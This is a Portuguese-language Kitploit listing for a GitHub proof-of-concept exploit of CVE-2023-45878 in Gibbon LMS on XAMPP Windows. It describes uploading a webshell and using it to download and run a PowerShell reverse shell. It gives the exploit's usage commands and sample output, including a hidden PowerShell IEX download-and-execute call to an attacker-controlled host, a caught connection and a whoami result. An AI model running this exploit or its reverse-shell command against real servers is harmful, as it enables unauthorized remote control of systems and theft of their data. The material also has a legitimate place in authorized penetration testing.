Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2023-45878-POC — CVE-2023-45878 poc para gibbon LMS no xampp windows | Kitploit
Ferramentas/GitHubGitHub/pauldhaes/cve-2023-45878-poc
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoComando e Controle
GitHubpauldhaes/cve-2023-45878-poc

CVE-2023-45878-POC

CVE-2023-45878 poc para gibbon LMS no xampp windows

Ver Repositório
1há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2023-45878-POC

POC do CVE-2023-45878 para Gibbon LMS no XAMPP Windows. Faz upload de uma webshell chamada shell.php para injeção de comandos. Para shell reversa, faz upload de um script ps1 de shell reversa do PowerShell chamado shell.ps1, que é enviado para a máquina alvo usando o shell.php.

Requisitos

Python3 Módulo Requests do python3 netcat

root@kitploit:~
pip3 install requests

Ambiente virtual

root@kitploit:~
mkdir CVE-2023-45878
cd CVE-2023-45878
python3 -m venv CVE
source CVE/bin/activate
cd ..
pip3 install requests

Uso

Testado no Gibbon LMS que estava rodando no XAMPP Windows sem AV habilitado. O alvo pode ser encontrado usando a página de login do Gibbon, por exemplo http://gibbon-example/Gibbon-LMS/

Shell reversa

root@kitploit:~
python3 reverse.py --reverse-shell -target_url http://target -ip IP -port REV-PORT -srvport SRVPORT

Resultado

root@kitploit:~
[+] PHP shell uploaded successfully to http://target/shell.php
[+] PowerShell reverse shell script saved to: shell.ps1
[+] The shell is now hosted at shell.ps1
Starting reverse shell listener in background...
Starting netcat listener on ip:REV-PORT...
[+] HTTP server running in the background on port SRVPORT
[+] Executing PHP shell to download and execute shell.ps1
Executing: http://target/shell.php?cmd=powershell%20-nop%20-w%20hidden%20-c%20IEX%20%28New-Object%20Net.WebClient%29.DownloadString%28%27http%3A//IP%3ASRVPORT/shell.ps1%27%29
[+] HTTP server started on http://0.0.0.0:SRVPORT/
TARGET-IP - - [20/Mar/2025 12:59:11] "GET /shell.ps1 HTTP/1.1" 200 -
Connection from TARGET-IP

PS C:\xampp\htdocs\Gibbon-LMS>

Comando único

root@kitploit:~
python3 reverse.py --single -target_url http://target -command whoami

Resultado

root@kitploit:~
[+] PHP shell uploaded successfully to http://target/shell.php
[+] Executing PHP command
Executing: http://target/shell.php?whoami
[+] Command executed successfully pres enter
vuln\w.webservice

Créditos

https://herolab.usd.de/security-advisories/usd-2023-0025/

Baixar ferramenta